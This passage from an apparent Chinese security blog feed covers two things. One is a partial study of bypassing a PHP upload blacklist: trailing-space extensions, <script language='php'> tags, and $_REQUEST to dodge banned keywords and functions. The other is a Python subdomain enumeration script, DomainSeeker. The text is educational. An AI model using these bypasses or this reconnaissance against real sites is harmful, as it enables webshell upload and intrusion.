<span class="keyword">else</span></div><div class="line">      &#123;</div><div class="line">        <span class="comment">// echo $_FILES["file"]["tmp_name"];</span></div><div class="line">      move_uploaded_file($_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>],<span class="string">"upload/"</span> . $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>]);</div><div class="line">      <span class="keyword">echo</span> <span class="string">"Stored in: "</span> . <span class="string">"upload/"</span> . $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>];</div><div class="line">      &#125;</div><div class="line">    &#125;</div><div class="line">    &#125;</div><div class="line">  &#125;</div><div class="line"><span class="keyword">else</span></div><div class="line">  &#123;</div><div class="line">  <span class="keyword">echo</span> <span class="string">"$str error"</span>;</div><div class="line">  &#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>自己本地写了个表单，用来提交上传请求 index.html:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;!DOCTYPE html&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">"en"</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></div><div class="line">	<span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"UTF-8"</span>&gt;</span></div><div class="line">	<span class="tag">&lt;<span class="name">title</span>&gt;</span>File Upload Bypass Demo<span class="tag">&lt;/<span class="name">title</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></div><div class="line">	<span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"upload.php"</span> <span class="attr">method</span>=<span class="string">"POST"</span> <span class="attr">enctype</span>=<span class="string">"multipart/form-data"</span>&gt;</span></div><div class="line">		<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"file"</span> <span class="attr">name</span>=<span class="string">"file"</span>&gt;</span><span class="tag">&lt;/<span class="name">input</span>&gt;</span></div><div class="line">		<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span>&gt;</span><span class="tag">&lt;/<span class="name">input</span>&gt;</span></div><div class="line"></div><div class="line">	<span class="tag">&lt;/<span class="name">form</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></div></pre></td></tr></table></figure>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>分析 upload.php 的源码，可以看出首先会对上传文件的后缀名做黑名单过滤，然后对上传文件的内容进行过滤，所以Fuzz的时候主要是解决这两个问题。</p>
<h3 id="绕过后缀名过滤"><a href="#绕过后缀名过滤" class="headerlink" title="绕过后缀名过滤"></a>绕过后缀名过滤</h3><p>这个比较简单，使用 Burp 代理请求，在后缀名后面多输入一个空格就可以。<br>上传 fuck.php 的时候 burp 拦截，修改成如下：</p>
<p>修改后可以绕过 upload.php 中对后缀名的检查，同时不影响文件的生成(move_uploaded_file)。</p>
<h3 id="绕过文本内容过滤"><a href="#绕过文本内容过滤" class="headerlink" title="绕过文本内容过滤"></a>绕过文本内容过滤</h3><p>首先要知道上传可以执行的一句话木马（脚本）需要的必要条件：</p>
<ol>
<li>能被 PHP 引擎（Zend Engine）解析执行（PHP环境）。</li>
<li>脚本中有用户可以控制的输入点。</li>
<li>用户输入的数据能够被当做 PHP代码执行。</li>
</ol>
<p>说白了，可以归纳为两点：1,用户能控制输入 2, 输入的数据能够当做代码解析。<br>有这两点就写个 shell 就已经足够了。</p>
<p>之所以在这里分成3点，原因我会从源码的角度对这三点进行分析，并给出对应的绕过方案。</p>
<h4 id="构造PHP环境"><a href="#构造PHP环境" class="headerlink" title="构造PHP环境"></a>构造PHP环境</h4><p>因为正则表达式中<code>\&lt;\? |\?\&gt;|\&lt;\%|</code>这段代码的存在导致无法正常定义 PHP 脚本，所以，可以用这种方法定义：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;script language=<span class="string">"php"</span>&gt; PHP 代码 &lt;/script&gt;</div></pre></td></tr></table></figure></p>
<h4 id="插入用户可以控制的输入点"><a href="#插入用户可以控制的输入点" class="headerlink" title="插入用户可以控制的输入点"></a>插入用户可以控制的输入点</h4><p>因为 <code>[$]_GET|[$]_POST|[$]_COOKIE</code> 都已经被过滤，所以无非找找其他的输入接收关键字有没有过滤，或者换一种方式（感觉应该会有，我没想到），在这里突然想到了没有过滤 REQUEST 方法，随意直接用 REQUEST 构造 一句话就可以了。</p>
<h4 id="让数据可以在服务端当做PHP代码执行"><a href="#让数据可以在服务端当做PHP代码执行" class="headerlink" title="让数据可以在服务端当做PHP代码执行"></a>让数据可以在服务端当做PHP代码执行</h4><p>因为 <code>passthru|open|[$]_FILES|system|eval|exec|assert</code> 这些危险函数直接被 ban 了，所以要想办法绕过，</p>
<p>———————–  放着，这个坑以后填上  —————————</p>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h2&gt;&lt;p&gt;No老师之前给了个 PHP 上传脚本，正好趁着晚上没事做研究了一下。&lt;br&gt;因为这次直接拿到了源代码，绕过的过程思路很清晰，倒是真正绕过后感
    
    </summary>
    
    
      <category term="文件上传" scheme="http://www.evilclay.com/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"/>
    
  </entry>
  
  <entry>
    <title>DomainSeeker 多方式收集目标子域名信息</title>
    <link href="http://www.evilclay.com/2017/01/02/domain-seeker%E4%BA%8C%E7%BA%A7%E5%9F%9F%E5%90%8D%E6%94%B6%E9%9B%86%E8%84%9A%E6%9C%AC/"/>
    <id>http://www.evilclay.com/2017/01/02/domain-seeker二级域名收集脚本/</id>
    <published>2017-01-02T06:34:07.000Z</published>
    <updated>2017-01-02T06:45:46.364Z</updated>
    
    <content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>参照猪猪侠的 wydomain 项目写一个简单的二级域名查找的脚本，提供三种方式来收集目标的子域名信息。</p>
<ul>
<li>DNS枚举</li>
<li>搜索引擎结果</li>
<li>子域名查询接口</li>
</ul>
<p>并且综合三种方式收集的子域名进行去重处理。</p>
<h2 id="运行"><a href="#运行" class="headerlink" title="运行"></a>运行</h2><p>程序帮助</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">usage: domain_seeker.py [-h] [-t NUM] [-d DOMAIN] [-b] [-s] [-a]</div><div class="line"></div><div class="line">Multi-method SubDomain Seeker</div><div class="line"></div><div class="line">optional arguments:</div><div class="line">  -h, --help            show this help message <span class="keyword">and</span> exit</div><div class="line">  -t NUM, --thread NUM  thread count</div><div class="line">  -d DOMAIN, --domain DOMAIN</div><div class="line">                        target doamin</div><div class="line">  -b, --bruteforce      dns bruteforce</div><div class="line">  -s, --search          search engine</div><div class="line">  -a, --api             domain finder api</div></pre></td></tr></table></figure>
<p>测试收集 swu.edu.cn 的所有域名，可以看到经过去重后还有282个子域名条目。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/domain_seeker_demo.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<h2 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div></pre></td><td class="code"><pre><div class="line"></div><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># encoding:utf-8</span></div><div class="line"><span class="comment"># author: Anka9080</span></div><div class="line"><span class="comment"># email: funsociety.bat@gmail.com</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> re</div><div class="line"><span class="keyword">import</span> sys</div><div class="line"><span class="keyword">import</span> Queue</div><div class="line"><span class="keyword">import</span> logging</div><div class="line"><span class="keyword">import</span> threading</div><div class="line"><span class="keyword">import</span> requests</div><div class="line"><span class="keyword">import</span> argparse</div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">import</span> dns.resolver</div><div class="line"><span class="keyword">import</span> dns.rdatatype</div><div class="line"></div><div class="line"></div><div class="line">logging.basicConfig(</div><div class="line">    level=logging.INFO, </div><div class="line">    format=<span class="string">'%(asctime)s [%(levelname)s] %(message)s'</span>,</div><div class="line">)</div><div class="line">logging.getLogger(<span class="string">"requests"</span>).setLevel(logging.WARN)</div><div class="line"></div><div class="line"><span class="comment"># 域名服务器</span></div><div class="line">NAMESERVERS = [</div><div class="line">    <span class="string">'114.114.114.114'</span>,</div><div class="line">    <span class="string">'119.29.29.29'</span>,</div><div class="line">    <span class="string">'223.5.5.5'</span>,</div><div class="line">    <span class="string">'8.8.8.8'</span>,</div><div class="line">    <span class="string">'182.254.116.116'</span>,</div><div class="line">    <span class="string">'223.6.6.6'</span>,</div><div class="line">    <span class="string">'8.8.4.4'</span>,</div><div class="line">    <span class="string">'180.76.76.76'</span>,</div><div class="line">    <span class="string">'216.146.35.35'</span>,</div><div class="line">    <span class="string">'123.125.81.6'</span>,</div><div class="line">    <span class="string">'218.30.118.6'</span>,</div><div class="line">]</div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileUtils</span><span class="params">(object)</span>:</span></div><div class="line"><span class="meta">    @staticmethod</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">getLines</span><span class="params">(filename)</span>:</span></div><div class="line">        <span class="keyword">with</span> open(filename) <span class="keyword">as</span> fn:</div><div class="line">            <span class="keyword">for</span> line <span class="keyword">in</span> fn.readlines():</div><div class="line">                <span class="keyword">yield</span> line.strip()</div><div class="line"></div><div class="line"><span class="comment"># 域名基类(提供解析相关的功能函数)</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">Domain</span><span class="params">(object)</span>:</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self,nameservers=[],timeout=<span class="string">''</span>)</span>:</span></div><div class="line">        self.resolver = dns.resolver.Resolver()</div><div class="line">        <span class="keyword">if</span> nameservers: self.resolver.nameservers = nameservers</div><div class="line">        <span class="keyword">if</span> timeout: self.resolver.timeout = timeout</div><div class="line">        </div><div class="line"></div><div class="line">    <span class="comment"># 获取泛解析的IP列表</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">extensive</span><span class="params">(self,target)</span>:</span></div><div class="line">        test_domains = [<span class="string">'Anka9080_&#123;0&#125;.&#123;1&#125;'</span>.format(i,target) <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">3</span>)]</div><div class="line">        <span class="comment"># print '-- test_domains:',test_domains</span></div><div class="line">        e_ips = []</div><div class="line">        <span class="keyword">for</span> domain <span class="keyword">in</span> test_domains:</div><div class="line">            record = self.query(domain,<span class="string">'A'</span>)</div><div class="line">            <span class="keyword">if</span> record <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">None</span>:</div><div class="line">                e_ips.extend(record[<span class="string">'A'</span>])</div><div class="line">        <span class="keyword">return</span> e_ips</div><div class="line"></div><div class="line">    <span class="comment"># 解析域名</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">query</span><span class="params">(self,target,rdtype)</span>:</span></div><div class="line">        <span class="keyword">try</span>:</div><div class="line">            answer = self.resolver.query(target, rdtype)</div><div class="line">            <span class="keyword">return</span> self.parser(answer)</div><div class="line">        <span class="keyword">except</span> dns.resolver.NoAnswer:</div><div class="line">            <span class="keyword">return</span> <span class="keyword">None</span> <span class="comment"># catch the except, nothing to do</span></div><div class="line">        <span class="keyword">except</span> dns.resolver.NXDOMAIN:</div><div class="line">            <span class="keyword">return</span> <span class="keyword">None</span> <span class="comment"># catch the except, nothing to do</span></div><div class="line">        <span class="keyword">except</span> dns.resolver.Timeout:</div><div class="line">            <span class="comment"># timeout retry</span></div><div class="line">            print(target, rdtype, <span class="string">'&lt;timeout&gt;'</span>)</div><div class="line">        <span class="keyword">except</span> Exception, e:</div><div class="line">            <span class="keyword">raise</span> e</div><div class="line">            logging.info(str(e))</div><div class="line">            </div><div class="line">            </div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">parser</span><span class="params">(self, answer)</span>:</span></div><div class="line">        <span class="string">"""result relationship only two format </span></div><div class="line">        @domain     domain name</div><div class="line">        @address    ip address</div><div class="line">        """</div><div class="line">        result = &#123;&#125;</div><div class="line">        <span class="keyword">for</span> rrsets <span class="keyword">in</span> answer.response.answer:</div><div class="line">            <span class="keyword">for</span> item <span class="keyword">in</span> rrsets.items:</div><div class="line">                rdtype = self.get_type_name(item.rdtype)</div><div class="line"></div><div class="line">                <span class="keyword">if</span> item.rdtype == self.get_type_id(<span class="string">'A'</span>):</div><div class="line">                    <span class="keyword">if</span> result.has_key(rdtype):</div><div class="line">                        result[rdtype].append(item.address)</div><div class="line">                    <span class="keyword">else</span>:</div><div class="line">                        result[rdtype] = [item.address]</div><div class="line">        <span class="keyword">return</span> result</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">is_domain</span><span class="params">(self, domain)</span>:</span></div><div class="line">        domain_regex = re.compile(</div><div class="line">            <span class="string">r'(?:[A-Z0-9_](?:[A-Z0-9-_]&#123;0,247&#125;[A-Z0-9])?\.)+(?:[A-Z]&#123;2,6&#125;|[A-Z0-9-]&#123;2,&#125;(?&lt;!-))\Z'</span>, </div><div class="line">            re.IGNORECASE)</div><div class="line">        <span class="keyword">return</span> <span class="keyword">True</span> <span class="keyword">if</span> domain_regex.match(domain) <span class="keyword">else</span> <span class="keyword">False</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_type_name</span><span class="params">(self, typeid)</span>:</span></div><div class="line">        <span class="keyword">return</span> dns.rdatatype.to_text(typeid)</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_type_id</span><span class="params">(self, name)</span>:</span></div><div class="line">        <span class="keyword">return</span> dns.rdatatype.from_text(name)</div><div class="line"></div><div class="line"><span class="comment"># 域名枚举类(域名解析的入口)</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">DomainFuzzer</span><span class="params">(object)</span>:</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self,target,dict_file=<span class="string">'top200_domain.txt'</span>)</span>:</span></div><div class="line">        self.target = target</div><div class="line">        self.dict = list(set(FileUtils.getLines(dict_file)))</div><div class="line">        self.resolver = Domain(NAMESERVERS,timeout=<span class="number">5</span>)</div><div class="line"></div><div class="line">    <span class="comment"># 多线程枚举 入口</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(self,thread_cnt=<span class="number">16</span>)</span>:</span></div><div class="line">        <span class="comment"># 所有子域名队列,check后存在的域名和IP字典</span></div><div class="line">        all_queue,ok_queue = Queue.Queue(),Queue.Queue()</div><div class="line">        <span class="keyword">for</span> line <span class="keyword">in</span> self.dict:</div><div class="line">            all_queue.put(<span class="string">'.'</span>.join([str(line),str(self.target)]))</div><div class="line">        </div><div class="line">        e_ips,threads = self.resolver.extensive(self.target),[]</div><div class="line">        <span class="comment"># print '-- extensive',e_ips</span></div><div class="line"></div><div class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> xrange(thread_cnt):</div><div class="line">            threads.append(self.bruteWorker(self.resolver,all_queue,ok_queue,e_ips))</div><div class="line">        </div><div class="line">        <span class="keyword">for</span> t <span class="keyword">in</span> threads: t.start()</div><div class="line">        <span class="keyword">for</span> t <span class="keyword">in</span> threads: t.join()</div><div class="line"></div><div class="line">        <span class="keyword">while</span> <span class="keyword">not</span> ok_queue.empty():</div><div class="line">            <span class="keyword">yield</span> ok_queue.get()</div><div class="line"></div><div class="line">    <span class="comment"># 单线程枚举入口</span></div><div class="line">    <span class="class"><span class="keyword">class</span> <span class="title">bruteWorker</span><span class="params">(threading.Thread)</span>:</span></div><div class="line"></div><div class="line">        <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self,resolver,all_queue,ok_queue,extensive=[])</span>:</span></div><div class="line">            threading.Thread.__init__(self)</div><div class="line">            self.all_queue = all_queue</div><div class="line">            self.resolver = resolver</div><div class="line">            self.ok_queue = ok_queue</div><div class="line">            self.extensive = extensive</div><div class="line"></div><div class="line">        <span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(self)</span>:</span></div><div class="line">            <span class="keyword">try</span>:</div><div class="line">                <span class="keyword">while</span> <span class="keyword">not</span> self.all_queue.empty():</div><div class="line">                    sub = self.all_queue.get_nowait()</div><div class="line">                    <span class="comment"># print '-- sub: ',sub</span></div><div class="line"></div><div class="line">                    record = self.resolver.query(sub,<span class="string">'A'</span>)</div><div class="line">                    <span class="keyword">if</span> record:</div><div class="line">                        ips = record[<span class="string">'A'</span>]</div><div class="line">                        <span class="keyword">for</span> ip <span class="keyword">in</span> ips:</div><div class="line">                            <span class="keyword">if</span> ip <span class="keyword">not</span> <span class="keyword">in</span> self.extensive:</div><div class="line">                                self.ok_queue.put(sub)</div><div class="line">                                <span class="keyword">break</span></div><div class="line">                <span class="keyword">return</span> self.ok_queue</div><div class="line">            <span class="keyword">except</span> Exception,e:</div><div class="line">                <span class="keyword">pass</span></div><div class="line"></div><div class="line"><span class="comment"># 好搜搜索引擎接口</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">HaosouAPI</span><span class="params">(object)</span>:</span></div><div class="line"></div><div class="line">    api = <span class="string">'http://www.haosou.com/s?src=360sou_newhome&amp;q=site:'</span></div><div class="line">    <span class="comment"># 好搜搜索引擎的入口</span></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self,target)</span>:</span></div><div class="line">        self.target = target</div><div class="line">        self.ptn = self.get_ptn()</div><div class="line"></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_ptn</span><span class="params">(self)</span>:</span></div><div class="line">        tmp = self.target.replace(<span class="string">'.'</span>,<span class="string">'\.'</span>)</div><div class="line">        <span class="keyword">return</span> re.compile(<span class="string">'linkinfo\"\&gt;\&lt;cite\&gt;(.+?\.'</span>+tmp+<span class="string">')'</span>)</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(self,page_cnt=<span class="number">50</span>)</span>:</span></div><div class="line">        subs = []</div><div class="line">        <span class="keyword">for</span> x <span class="keyword">in</span> xrange(<span class="number">1</span>,page_cnt):</div><div class="line">            url = self.api+self.target+<span class="string">'&amp;pn='</span>+str(x)</div><div class="line">            <span class="keyword">try</span>:</div><div class="line">                rsp = requests.get(url)</div><div class="line">            <span class="keyword">except</span> Exception,e:</div><div class="line">                logging.info(str(e))</div><div class="line">                <span class="keyword">continue</span></div><div class="line">            html = rsp.text</div><div class="line">            items = re.findall(self.ptn,html)</div><div class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> items:</div><div class="line">                subs.append(i)</div><div class="line">        <span class="keyword">return</span> set(subs)</div><div class="line"></div><div class="line"><span class="comment"># i.links.cn 子域名查询接口</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">ILinksAPI</span><span class="params">(object)</span>:</span></div><div class="line"></div><div class="line">    api = <span class="string">'http://i.links.cn/subdomain/'</span></div><div class="line">    headers = &#123;</div><div class="line">        <span class="string">"Content-Type"</span>: <span class="string">"application/x-www-form-urlencoded"</span>, </div><div class="line">        <span class="string">"Referer"</span>: <span class="string">"http://i.links.cn/subdomain/"</span>,</div><div class="line">        <span class="string">"User-Agent"</span>:<span class="string">"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36"</span></div><div class="line">    &#125;</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self,target)</span>:</span></div><div class="line">        self.target = target</div><div class="line">        self.ptn = self.get_ptn()</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_ptn</span><span class="params">(self)</span>:</span></div><div class="line">        tmp = self.target.replace(<span class="string">'.'</span>,<span class="string">'\.'</span>)</div><div class="line">        <span class="keyword">return</span> re.compile(<span class="string">'https?://([\w\-\.]*?'</span>+tmp+<span class="string">')'</span>)</div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(self)</span>:</span></div><div class="line">        subs = set()</div><div class="line">        data = &#123;</div><div class="line">            <span class="string">'domain'</span>:self.target,</div><div class="line">            <span class="string">'b2'</span>:<span class="number">1</span>,</div><div class="line">            <span class="string">"b3"</span>:<span class="number">1</span>,</div><div class="line">            <span class="string">"b4"</span>:<span class="number">1</span></div><div class="line">        &#125;</div><div class="line">        <span class="keyword">try</span>:</div><div class="line">            rsp = requests.post(self.api,headers=self.headers,data=data)</div><div class="line">        <span class="keyword">except</span> Exception,e:</div><div class="line">            logging.info(str(e))</div><div class="line">            <span class="keyword">return</span> subs</div><div class="line">        html = rsp.text</div><div class="line">        items = re.findall(self.ptn,html)</div><div class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> items:</div><div class="line">            subs.add(i)</div><div class="line">        <span class="keyword">return</span> subs</div><div class="line">            </div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span><span class="params">(args)</span>:</span></div><div class="line">    domain = args.domain</div><div class="line">    thread_cnt = int(args.thread)</div><div class="line">    <span class="keyword">if</span> <span class="keyword">not</span> domain:</div><div class="line">        print(<span class="string">'usage: domain_seeker.py -d aliyun.com -a'</span>)</div><div class="line">        sys.exit(<span class="number">1</span>)</div><div class="line"></div><div class="line">    res_subs = set()</div><div class="line"></div><div class="line">    <span class="comment"># 使用 API</span></div><div class="line">    <span class="keyword">if</span> args.api:</div><div class="line">        iapi = ILinksAPI(domain)</div><div class="line">        subs = iapi.run()</div><div class="line">        logging.info(<span class="string">'API Module success with '</span>+str(len(subs)))</div><div class="line">        res_subs = res_subs.union(subs)  </div><div class="line"></div><div class="line">    <span class="comment"># 使用搜索引擎</span></div><div class="line">    <span class="keyword">if</span> args.search:</div><div class="line">        ha = HaosouAPI(domain)</div><div class="line">        subs = ha.run()</div><div class="line">        logging.info(<span class="string">'Search Engine Module success with '</span>+str(len(subs)))</div><div class="line">        res_subs = res_subs.union(subs)</div><div class="line"></div><div class="line">    <span class="comment"># 使用 dns 枚举</span></div><div class="line">    <span class="keyword">if</span> args.bruteforce:</div><div class="line">        <span class="comment"># logging.info("Fuck")</span></div><div class="line">        df = DomainFuzzer(domain)</div><div class="line">        <span class="comment"># 爆破得到的域名列表</span></div><div class="line">        subs = set()</div><div class="line">        <span class="keyword">for</span> sub <span class="keyword">in</span> df.run(thread_cnt):</div><div class="line">            subs.add(sub)</div><div class="line">        logging.info(<span class="string">'Bruteforce Module success with '</span>+str(len(subs)))</div><div class="line">        res_subs = res_subs.union(subs)</div><div class="line"></div><div class="line">    logging.info(<span class="string">'End success with '</span>+str(len(res_subs)))</div><div class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> res_subs:</div><div class="line">        <span class="keyword">print</span> x</div><div class="line">    <span class="keyword">return</span> res_subs</div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    parser = argparse.ArgumentParser(description=<span class="string">"Multi-method SubDomain Seeker"</span>)</div><div class="line">    parser.add_argument(<span class="string">"-t"</span>,<span class="string">"--thread"</span>,metavar=<span class="string">'NUM'</span>,default=<span class="number">100</span>,help=<span class="string">"thread count"</span>)</div><div class="line">    parser.add_argument(<span class="string">"-d"</span>,<span class="string">"--domain"</span>,metavar=<span class="string">'DOMAIN'</span>,help=<span class="string">"target doamin"</span>)</div><div class="line">    